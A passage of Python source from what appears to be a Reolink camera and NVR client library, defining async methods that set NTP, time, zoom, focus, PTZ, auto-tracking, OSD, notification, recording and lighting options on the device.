\"GetRecV20\":\n self._recording_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPtzPreset\":\n self._ptz_presets_settings[channel] = data[\"value\"]\n self._ptz_presets[channel] = {}\n for preset in data[\"value\"][\"PtzPreset\"]:\n if int(preset[\"enable\"]) == 1:\n preset_name = preset[\"name\"]\n preset_id = int(preset[\"id\"])\n self._ptz_presets[channel][preset_name] = preset_id\n\n elif data[\"cmd\"] == \"GetPtzGuard\":\n self._ptz_guard_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPtzCurPos\":\n self._ptz_position[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAiCfg\":\n self._auto_track_settings[channel] = data[\"value\"]\n if \"range\" in data:\n self._auto_track_range[channel] = data[\"range\"]\n\n elif data[\"cmd\"] == \"GetPtzTraceSection\":\n self._auto_track_limits[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioCfg\":\n self._audio_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioAlarm\":\n self._audio_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioAlarmV20\":\n self._audio_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioFileList\":\n self._audio_file_list[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAutoReply\":\n self._auto_reply_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAutoFocus\":\n self._auto_focus_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetZoomFocus\":\n self._zoom_focus_settings[channel] = data[\"value\"]\n if \"range\" in data:\n self._zoom_focus_range[channel] = data[\"range\"][\"ZoomFocus\"]\n\n except Exception as err:\n _LOGGER.error(\n \"Host %s:%s (channel %s) failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n channel,\n str(err),\n traceback.format_exc(),\n )\n continue\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: command %s response channel %s does not equal requested channel %s\", self._host, self._port, data[\"cmd\"], response_channel, channel)\n\n async def set_net_port(\n self,\n enable_onvif: bool | None = None,\n enable_rtmp: bool | None = None,\n enable_rtsp: bool | None = None,\n ) -> None:\n \"\"\"Set Network Port parameters on the host (NVR or camera).\"\"\"\n if self._netport_settings is None:\n 
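# SetNetPort is sent with the full cached NetPort block as its base payload, so fetch it once here if it was never read.\n            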
await self.get_state(\"GetNetPort\")\n\n if self._netport_settings is None:\n raise NotSupportedError(f\"set_net_port: failed to retrieve current NetPort settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNetPort\", \"param\": self._netport_settings}]\n\n if enable_onvif is not None:\n body[0][\"param\"][\"NetPort\"][\"onvifEnable\"] = 1 if enable_onvif else 0\n if enable_rtmp is not None:\n body[0][\"param\"][\"NetPort\"][\"rtmpEnable\"] = 1 if enable_rtmp else 0\n if enable_rtsp is not None:\n body[0][\"param\"][\"NetPort\"][\"rtspEnable\"] = 1 if enable_rtsp else 0\n\n await self.send_setting(body)\n await self.expire_session() # When changing network port settings, tokens are invalidated.\n\n async def set_time(self, dateFmt=None, hours24=None, tzOffset=None) -> None:\n \"\"\"Set time on the host (NVR or camera).\n Arguments:\n dateFmt (string) Format of the date in the OSD timestamp\n hours24 (boolean) True selects 24h format, False selects 12h format\n tzoffset (int) Timezone offset versus UTC in seconds\n\n Always get current time first\"\"\"\n await self.get_state(\"GetTime\")\n if self._time_settings is None:\n raise NotSupportedError(f\"set_time: failed to retrieve current time settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetTime\", \"action\": 0, \"param\": self._time_settings}]\n\n if dateFmt is not None:\n if dateFmt in [\"DD/MM/YYYY\", \"MM/DD/YYYY\", \"YYYY/MM/DD\"]:\n body[0][\"param\"][\"Time\"][\"timeFmt\"] = dateFmt\n else:\n raise InvalidParameterError(f\"set_time: date format {dateFmt} not in ['DD/MM/YYYY', 'MM/DD/YYYY', 'YYYY/MM/DD']\")\n\n if hours24 is not None:\n if hours24:\n body[0][\"param\"][\"Time\"][\"hourFmt\"] = 0\n else:\n body[0][\"param\"][\"Time\"][\"hourFmt\"] = 1\n\n if tzOffset is not None:\n if not isinstance(tzOffset, int):\n raise InvalidParameterError(f\"set_time: time zone offset {tzOffset} is not integer\")\n if tzOffset < -43200 or tzOffset > 50400:\n raise InvalidParameterError(f\"set_time: time zone offset {tzOffset} not in range -43200..50400\")\n body[0][\"param\"][\"Time\"][\"timeZone\"] = tzOffset\n\n await self.send_setting(body)\n\n async def set_ntp(self, enable: bool | None = None, server: str | None = None, port: int | None = None, interval: int | None = None) -> None:\n \"\"\"\n Set NTP parameters on the host (NVR or camera).\n Arguments:\n enable (boolean) Enable synchronization\n server (string) Name or IP-Address of time server (or pool)\n port (int) Port number in range of (1..65535)\n interval (int) Interval of synchronization in minutes in range of (60-65535)\n \"\"\"\n if self._ntp_settings is None:\n await self.get_state(\"GetNtp\")\n\n if self._ntp_settings is None:\n raise NotSupportedError(f\"set_ntp: failed to retrieve current NTP settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNtp\", \"action\": 0, \"param\": self._ntp_settings}]\n\n if enable is not None:\n if enable:\n body[0][\"param\"][\"Ntp\"][\"enable\"] = 1\n else:\n body[0][\"param\"][\"Ntp\"][\"enable\"] = 0\n\n if server is not None:\n body[0][\"param\"][\"Ntp\"][\"server\"] = server\n\n if port is not None:\n if not isinstance(port, int):\n raise InvalidParameterError(f\"set_ntp: Invalid NTP port {port} specified, type is not integer\")\n if port < 1 or port > 65535:\n raise InvalidParameterError(f\"set_ntp: Invalid NTP port {port} specified, out of valid range 1...65535\")\n body[0][\"param\"][\"Ntp\"][\"port\"] = port\n\n if 
interval is not None:\n if not isinstance(interval, int):\n raise InvalidParameterError(f\"set_ntp: Invalid NTP interval {interval} specified, type is not integer\")\n if interval < 60 or interval > 65535:\n raise InvalidParameterError(f\"set_ntp: Invalid NTP interval {interval} specified, out of valid range 60...65535\")\n body[0][\"param\"][\"Ntp\"][\"interval\"] = interval\n\n await self.send_setting(body)\n\n async def sync_ntp(self) -> None:\n \"\"\"Sync date and time on the host via NTP now.\"\"\"\n if self._ntp_settings is None:\n await self.get_state(\"GetNtp\")\n\n if self._ntp_settings is None:\n raise NotSupportedError(f\"set_ntp: failed to retrieve current NTP settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNtp\", \"action\": 0, \"param\": self._ntp_settings}]\n body[0][\"param\"][\"Ntp\"][\"interval\"] = 0\n\n await self.send_setting(body)\n\n def get_focus(self, channel: int) -> None:\n \"\"\"Get absolute focus value.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_focus: no camera connected to channel '{channel}'\")\n if channel not in self._zoom_focus_settings or not self._zoom_focus_settings[channel]:\n raise NotSupportedError(f\"get_focus: ZoomFocus on camera {self.camera_name(channel)} is not available\")\n\n return self._zoom_focus_settings[channel][\"ZoomFocus\"][\"focus\"][\"pos\"]\n\n async def set_focus(self, channel: int, focus: int) -> None:\n \"\"\"Set absolute focus value.\n Parameters:\n focus (int) 0..223\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_focus: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"focus\"):\n raise NotSupportedError(f\"set_focus: not supported by camera {self.camera_name(channel)}\")\n min_focus = self.zoom_range(channel)[\"focus\"][\"pos\"][\"min\"]\n max_focus = self.zoom_range(channel)[\"focus\"][\"pos\"][\"max\"]\n if not isinstance(focus, int):\n raise InvalidParameterError(f\"set_focus: focus value {focus} not integer\")\n if focus not in range(min_focus, max_focus + 1):\n raise InvalidParameterError(f\"set_focus: focus value {focus} not in range {min_focus}..{max_focus}\")\n\n body = [\n {\n \"cmd\": \"StartZoomFocus\",\n \"action\": 0,\n \"param\": {\"ZoomFocus\": {\"channel\": channel, \"op\": \"FocusPos\", \"pos\": focus}},\n }\n ]\n\n await self.send_setting(body)\n await asyncio.sleep(3)\n await self.get_state(cmd=\"GetZoomFocus\")\n\n def autofocus_enabled(self, channel: int) -> bool:\n \"\"\"Auto focus enabled.\"\"\"\n if channel not in self._auto_focus_settings:\n return True\n\n return self._auto_focus_settings[channel][\"AutoFocus\"][\"disable\"] == 0\n\n async def set_autofocus(self, channel: int, enable: bool) -> None:\n \"\"\"Enable/Disable AutoFocus on a camera.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_autofocus: no camera connected to channel '{channel}'\")\n if channel not in self._auto_focus_settings:\n raise NotSupportedError(f\"set_autofocus: AutoFocus on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAutoFocus\", \"action\": 0, \"param\": {\"AutoFocus\": {\"disable\": 0 if enable else 1, \"channel\": channel}}}]\n await self.send_setting(body)\n\n def get_zoom(self, channel: int):\n \"\"\"Get absolute zoom value.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_zoom: no camera connected to channel '{channel}'\")\n if channel not in 
self._zoom_focus_settings or not self._zoom_focus_settings[channel]:\n raise NotSupportedError(f\"get_zoom: ZoomFocus on camera {self.camera_name(channel)} is not available\")\n\n return self._zoom_focus_settings[channel][\"ZoomFocus\"][\"zoom\"][\"pos\"]\n\n async def set_zoom(self, channel: int, zoom: int) -> None:\n \"\"\"Set absolute zoom value.\n Parameters:\n zoom (int) 0..33\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_zoom: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"zoom\"):\n raise NotSupportedError(f\"set_zoom: not supported by camera {self.camera_name(channel)}\")\n min_zoom = self.zoom_range(channel)[\"zoom\"][\"pos\"][\"min\"]\n max_zoom = self.zoom_range(channel)[\"zoom\"][\"pos\"][\"max\"]\n if not isinstance(zoom, int):\n raise InvalidParameterError(f\"set_zoom: zoom value {zoom} not integer\")\n if zoom not in range(min_zoom, max_zoom + 1):\n raise InvalidParameterError(f\"set_zoom: zoom value {zoom} not in range {min_zoom}..{max_zoom}\")\n\n body = [\n {\n \"cmd\": \"StartZoomFocus\",\n \"action\": 0,\n \"param\": {\"ZoomFocus\": {\"channel\": channel, \"op\": \"ZoomPos\", \"pos\": zoom}},\n }\n ]\n\n await self.send_setting(body)\n await asyncio.sleep(3)\n await self.get_state(cmd=\"GetZoomFocus\")\n\n def ptz_presets(self, channel: int) -> dict:\n if channel not in self._ptz_presets:\n return {}\n\n return self._ptz_presets[channel]\n\n async def set_ptz_command(self, channel: int, command: str | None = None, preset: int | str | None = None, speed: int | None = None) -> None:\n \"\"\"Send PTZ command to the camera, list of possible commands see PtzEnum.\"\"\"\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ptz_command: no camera connected to channel '{channel}'\")\n if speed is not None and not isinstance(speed, int):\n raise InvalidParameterError(f\"set_ptz_command: speed {speed} is not integer\")\n if speed is not None and not self.supported(channel, \"ptz_speed\"):\n raise NotSupportedError(f\"set_ptz_command: ptz speed on camera {self.camera_name(channel)} is not available\")\n command_list = [com.value for com in PtzEnum]\n if command is not None and command not in command_list:\n raise InvalidParameterError(f\"set_ptz_command: command {command} not in {command_list}\")\n\n if preset is not None:\n command = \"ToPos\"\n if isinstance(preset, str):\n if preset not in self.ptz_presets(channel):\n raise InvalidParameterError(f\"set_ptz_command: preset '{preset}' not in available presets {list(self.ptz_presets(channel).keys())}\")\n preset = self.ptz_presets(channel)[preset]\n if not isinstance(preset, int):\n raise InvalidParameterError(f\"set_ptz_command: preset {preset} is not integer\")\n\n if command is None:\n raise InvalidParameterError(\"set_ptz_command: No command or preset specified.\")\n\n body: typings.reolink_json = [\n {\n \"cmd\": \"PtzCtrl\",\n \"action\": 0,\n \"param\": {\"channel\": channel, \"op\": command},\n }\n ]\n\n if speed:\n body[0][\"param\"][\"speed\"] = speed\n if preset:\n body[0][\"param\"][\"id\"] = preset\n\n await self.send_setting(body)\n\n def ptz_pan_position(self, channel: int) -> int:\n \"\"\"pan position\"\"\"\n if channel not in self._ptz_position:\n return 0\n\n return self._ptz_position[channel][\"PtzCurPos\"][\"Ppos\"]\n\n def ptz_guard_enabled(self, channel: int) -> bool:\n if channel not in self._ptz_guard_settings:\n return False\n\n values = self._ptz_guard_settings[channel][\"PtzGuard\"]\n return values[\"benable\"] == 1 
and values[\"bexistPos\"] == 1\n\n def ptz_guard_time(self, channel: int) -> int:\n \"\"\"Guard point return time in seconds\"\"\"\n if channel not in self._ptz_guard_settings:\n return 60\n\n return self._ptz_guard_settings[channel][\"PtzGuard\"][\"timeout\"]\n\n async def set_ptz_guard(self, channel: int, command: str | None = None, enable: bool | None = None, time: int | None = None) -> None:\n \"\"\"Send PTZ guard.\"\"\"\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ptz_guard: no camera connected to channel '{channel}'\")\n if time is not None and not isinstance(time, int):\n raise InvalidParameterError(f\"set_ptz_guard: guard time {time} is not integer\")\n command_list = [com.value for com in GuardEnum]\n if command is not None and command not in command_list:\n raise InvalidParameterError(f\"set_ptz_guard: command {command} not in {command_list}\")\n\n params: dict[str, Any] = {\"channel\": channel}\n if command is not None:\n params[\"cmdStr\"] = command\n if command == \"setPos\":\n params[\"bSaveCurrentPos\"] = 1\n if command is None:\n params[\"cmdStr\"] = \"setPos\"\n if enable is not None:\n params[\"benable\"] = 1 if enable else 0\n if time is not None:\n params[\"timeout\"] = time\n\n body: typings.reolink_json = [{\"cmd\": \"SetPtzGuard\", \"action\": 0, \"param\": {\"PtzGuard\": params}}]\n await self.send_setting(body)\n\n async def ptz_callibrate(self, channel: int) -> None:\n \"\"\"Callibrate PTZ of the camera.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"ptz_callibrate: no camera connected to channel '{channel}'\")\n\n body: typings.reolink_json = [{\"cmd\": \"PtzCheck\", \"action\": 0, \"param\": {\"channel\": channel}}]\n await self.send_setting(body)\n\n def auto_track_enabled(self, channel: int) -> bool:\n if channel not in self._auto_track_settings:\n return False\n\n if \"bSmartTrack\" in self._auto_track_settings[channel]:\n return self._auto_track_settings[channel][\"bSmartTrack\"] == 1\n\n return self._auto_track_settings[channel][\"aiTrack\"] == 1\n\n def auto_track_disappear_time(self, channel: int) -> int:\n if channel not in self._auto_track_settings:\n return -1\n\n return self._auto_track_settings[channel].get(\"aiDisappearBackTime\", -1)\n\n def auto_track_stop_time(self, channel: int) -> int:\n if channel not in self._auto_track_settings:\n return -1\n\n return self._auto_track_settings[channel].get(\"aiStopBackTime\", -1)\n\n def auto_track_method(self, channel: int) -> Optional[int]:\n if channel not in self._auto_track_settings:\n return None\n\n return self._auto_track_settings[channel].get(\"aiTrack\")\n\n async def set_auto_tracking(\n self, channel: int, enable: bool | None = None, disappear_time: int | None = None, stop_time: int | None = None, method: int | str | None = None\n ) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_auto_tracking: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"auto_track\"):\n raise NotSupportedError(f\"set_auto_tracking: Auto tracking on camera {self.camera_name(channel)} is not available\")\n\n params = {\"channel\": channel}\n if enable is not None:\n if \"bSmartTrack\" in self._auto_track_settings[channel]:\n params[\"bSmartTrack\"] = 1 if enable else 0\n else:\n params[\"aiTrack\"] = 1 if enable else 0\n if disappear_time is not None:\n params[\"aiDisappearBackTime\"] = disappear_time\n if stop_time is not None:\n params[\"aiStopBackTime\"] = stop_time\n if method is not None:\n if 
isinstance(method, str):\n method_int = TrackMethodEnum[method].value\n else:\n method_int = method\n params[\"aiTrack\"] = method_int\n method_list = [val.value for val in TrackMethodEnum]\n if method_int not in method_list:\n raise InvalidParameterError(f\"set_auto_tracking: method {method_int} not in {method_list}\")\n\n body = [{\"cmd\": \"SetAiCfg\", \"action\": 0, \"param\": params}]\n await self.send_setting(body)\n\n def auto_track_limit_left(self, channel: int) -> int:\n \"\"\"-1 = limit not set\"\"\"\n if channel not in self._auto_track_limits:\n return -1\n\n return self._auto_track_limits[channel][\"PtzTraceSection\"][\"LimitLeft\"]\n\n def auto_track_limit_right(self, channel: int) -> int:\n \"\"\"-1 = limit not set\"\"\"\n if channel not in self._auto_track_limits:\n return -1\n\n return self._auto_track_limits[channel][\"PtzTraceSection\"][\"LimitRight\"]\n\n async def set_auto_track_limit(self, channel: int, left: int | None = None, right: int | None = None) -> None:\n \"\"\"-1 = disable limit\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_auto_track_limit: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"auto_track_limit\"):\n raise NotSupportedError(f\"set_auto_track_limit: Auto track limits on camera {self.camera_name(channel)} is not available\")\n if left is None and right is None:\n raise InvalidParameterError(\"set_auto_track_limit: either left or right limit needs to be specified\")\n if left is not None and (left < -1 or left > 2700):\n raise InvalidParameterError(f\"set_auto_track_limit: left limit {left} not in range -1...2700\")\n if right is not None and (right < -1 or right > 2700):\n raise InvalidParameterError(f\"set_auto_track_limit: right limit {right} not in range -1...2700\")\n\n params = {\"channel\": channel}\n if left is not None:\n params[\"LimitLeft\"] = left\n if right is not None:\n params[\"LimitRight\"] = right\n\n body = [{\"cmd\": \"SetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": params}}]\n await self.send_setting(body)\n\n def validate_osd_pos(self, pos) -> bool:\n \"\"\"Helper function for validating an OSD position\n Returns True, if a valid position is specified\"\"\"\n return pos in [\n \"Upper Left\",\n \"Upper Right\",\n \"Top Center\",\n \"Bottom Center\",\n \"Lower Left\",\n \"Lower Right\",\n ]\n\n async def set_osd(self, channel: int, namePos=None, datePos=None, enableWaterMark=None) -> None:\n \"\"\"Set OSD parameters.\n Parameters:\n namePos (string) specifies the position of the camera name - \"Off\" disables this OSD\n datePos (string) specifies the position of the date - \"Off\" disables this OSD\n enableWaterMark (boolean) enables/disables the Logo (WaterMark) if supported\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_osd: no camera connected to channel '{channel}'\")\n\n await self.get_state(\"GetOsd\")\n\n if channel not in self._osd_settings or not self._osd_settings[channel]:\n raise NotSupportedError(f\"set_osd: OSD on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetOsd\", \"action\": 0, \"param\": self._osd_settings[channel]}]\n\n if namePos is not None:\n if namePos == \"Off\":\n body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"enable\"] = 0\n else:\n if not self.validate_osd_pos(namePos):\n raise InvalidParameterError(f\"set_osd: Invalid name OSD position specified '{namePos}'\")\n body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"enable\"] = 1\n 
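# Note: only the position strings accepted by validate_osd_pos are valid here, e.g. 'Upper Left' or 'Bottom Center'.\n                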
body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"pos\"] = namePos\n\n if datePos is not None:\n if datePos == \"Off\":\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"enable\"] = 0\n else:\n if not self.validate_osd_pos(datePos):\n raise InvalidParameterError(f\"set_osd: Invalid date OSD position specified '{datePos}'\")\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"enable\"] = 1\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"pos\"] = datePos\n\n if enableWaterMark is not None:\n if \"watermark\" in body[0][\"param\"][\"Osd\"]:\n if enableWaterMark:\n body[0][\"param\"][\"Osd\"][\"watermark\"] = 1\n else:\n body[0][\"param\"][\"Osd\"][\"watermark\"] = 0\n else:\n _LOGGER.debug(\n 'Ignoring \"enable watermark\" request. Not supported by camera %s.',\n self.camera_name(channel),\n )\n\n await self.send_setting(body)\n\n async def set_push(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the Push-notifications parameter.\"\"\"\n if not self.supported(channel, \"push\"):\n raise NotSupportedError(f\"set_push: push-notifications on camera {self.camera_name(channel)} are not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetPush\") >= 1:\n body = [{\"cmd\": \"SetPushV20\", \"action\": 0, \"param\": {\"Push\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"push\"):\n body = [{\"cmd\": \"SetPush\", \"action\": 0, \"param\": {\"Push\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_push: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetPush\") >= 1:\n body = [{\"cmd\": \"SetPushV20\", \"action\": 0, \"param\": {\"Push\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetPush\", \"action\": 0, \"param\": {\"Push\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_ftp(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the FTP-notifications parameter.\"\"\"\n if not self.supported(channel, \"ftp\"):\n raise NotSupportedError(f\"set_ftp: FTP on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetFtp\") >= 1:\n body = [{\"cmd\": \"SetFtpV20\", \"action\": 0, \"param\": {\"Ftp\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"ftp\"):\n body = [{\"cmd\": \"SetFtp\", \"action\": 0, \"param\": {\"Ftp\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ftp: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetFtp\") >= 1:\n body = [{\"cmd\": \"SetFtpV20\", \"action\": 0, \"param\": {\"Ftp\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetFtp\", \"action\": 0, \"param\": {\"Ftp\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_email(self, channel: int | None, enable: bool) -> None:\n if not self.supported(channel, \"email\"):\n raise NotSupportedError(f\"set_email: Email on camera {self.camera_name(channel)} is not available\")\n\n body: 
typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetEmail\") >= 1:\n body = [{\"cmd\": \"SetEmailV20\", \"action\": 0, \"param\": {\"Email\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"email\"):\n body = [{\"cmd\": \"SetEmail\", \"action\": 0, \"param\": {\"Email\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_email: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetEmail\") >= 1:\n body = [{\"cmd\": \"SetEmailV20\", \"action\": 0, \"param\": {\"Email\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetEmail\", \"action\": 0, \"param\": {\"Email\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_recording(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the recording parameter.\"\"\"\n if not self.supported(channel, \"recording\"):\n raise NotSupportedError(f\"set_recording: recording on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetRec\") >= 1:\n body = [{\"cmd\": \"SetRecV20\", \"action\": 0, \"param\": {\"Rec\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"recording\"):\n body = [{\"cmd\": \"SetRec\", \"action\": 0, \"param\": {\"Rec\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_recording: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetRec\") >= 1:\n body = [{\"cmd\": \"SetRecV20\", \"action\": 0, \"param\": {\"Rec\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetRec\", \"action\": 0, \"param\": {\"Rec\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_buzzer(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the NVR buzzer parameter.\"\"\"\n if not self.supported(channel, \"buzzer\"):\n raise NotSupportedError(f\"set_buzzer: NVR buzzer on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n body = [{\"cmd\": \"SetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"Buzzer\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_recording: no camera connected to channel '{channel}'\")\n\n body = [{\"cmd\": \"SetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"Buzzer\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n await self.send_setting(body)\n\n async def set_audio(self, channel: int, enable: bool) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_audio: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetEnc\")\n if channel not in self._enc_settings:\n raise NotSupportedError(f\"set_audio: Audio on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetEnc\", \"action\": 0, \"param\": 
self._enc_settings[channel]}]\n body[0][\"param\"][\"Enc\"][\"audio\"] = 1 if enable else 0\n\n await self.send_setting(body)\n\n async def set_ir_lights(self, channel: int, enable: bool) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ir_lights: no camera connected to channel '{channel}'\")\n if channel not in self._ir_settings:\n raise NotSupportedError(f\"set_ir_lights: IR light on camera {self.camera_name(channel)} is not available\")\n\n state = \"Auto\" if enable else \"Off\"\n body: typings.reolink_json = [\n {\n \"cmd\": \"SetIrLights\",\n \"action\": 0,\n \"param\": {\"IrLights\": {\"channel\": channel, \"state\": state}},\n }\n ]\n\n await self.send_setting(body)\n\n async def set_status_led(self, channel: int, state: bool | str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_status_led: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"status_led\"):\n raise NotSupportedError(f\"set_status_led: Status led on camera {self.camera_name(channel)} is not available\")\n\n if isinstance(state, bool):\n value = \"On\" if state else \"Off\"\n else:\n value = state\n\n val_list = [val.value for val in StatusLedEnum]\n if value not in val_list:\n raise InvalidParameterError(f\"set_status_led: value {value} not in {val_list}\")\n\n if self.is_doorbell(channel):\n param = {\"channel\": channel, \"eDoorbellLightState\": value}\n else:\n param = {\"channel\": channel, \"state\": value}\n\n body: typings.reolink_json = [{\"cmd\": \"SetPowerLed\", \"action\": 0, \"param\": {\"PowerLed\": param}}]\n await self.send_setting(body)\n\n async def set_whiteled(self, channel: int, state: bool | None = None, brightness: int | None = None, mode: int | str | None = None) -> None:\n \"\"\"\n Set the WhiteLed parameter.\n with Reolink Duo GetWhiteLed returns an error state\n SetWhiteLed appears to require 4 parameters\n state - two values 0/1 possibly OFF/ON\n channel - appears to default to 0\n mode - three values I think\n 0 Night Mode Off\n 1 Night Mode On , AUTO on\n 3 Night Mode On, Set Time On\n brightness - brigtness level range 0 to 100\n\n TO BE CONFIRMED\n There may be an extra set of parameters with Duo - dont know with others\n LightingSchedule : { EndHour , EndMin, StartHour,StartMin }\n \"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_whiteled: no camera connected to channel '{channel}'\")\n if channel not in self._whiteled_settings or not self._whiteled_settings[channel]:\n raise NotSupportedError(f\"set_whiteled: White Led on camera {self.camera_name(channel)} is not available\")\n\n settings = {\"channel\": channel}\n if state is not None:\n settings[\"state\"] = 1 if state else 0\n if brightness is not None:\n settings[\"bright\"] = brightness\n if brightness < 0 or brightness > 100:\n raise InvalidParameterError(f\"set_whiteled: brightness {brightness} not in range 0..100\")\n if mode is not None:\n if isinstance(mode, str):\n mode_int = SpotlightModeEnum[mode].value\n else:\n mode_int = mode\n settings[\"mode\"] = mode_int\n mode_list = [mode.value for mode in SpotlightModeEnum]\n if mode_int not in mode_list:\n raise InvalidParameterError(f\"set_whiteled: mode {mode_int} not in {mode_list}\")\n\n body = [\n {\n \"cmd\": \"SetWhiteLed\",\n \"param\": {\"WhiteLed\": settings},\n }\n ]\n\n await self.send_setting(body, wait_before_get=3)\n\n async def set_spotlight_lighting_schedule(self, channel: int, endhour=6, endmin=0, starthour=18, startmin=0) -> None:\n 
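# Example call (illustrative, assuming a connected channel 0 and an initialized Host instance 'host'):\n        #   await host.set_spotlight_lighting_schedule(0, endhour=7, endmin=0, starthour=18, startmin=30)\n        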
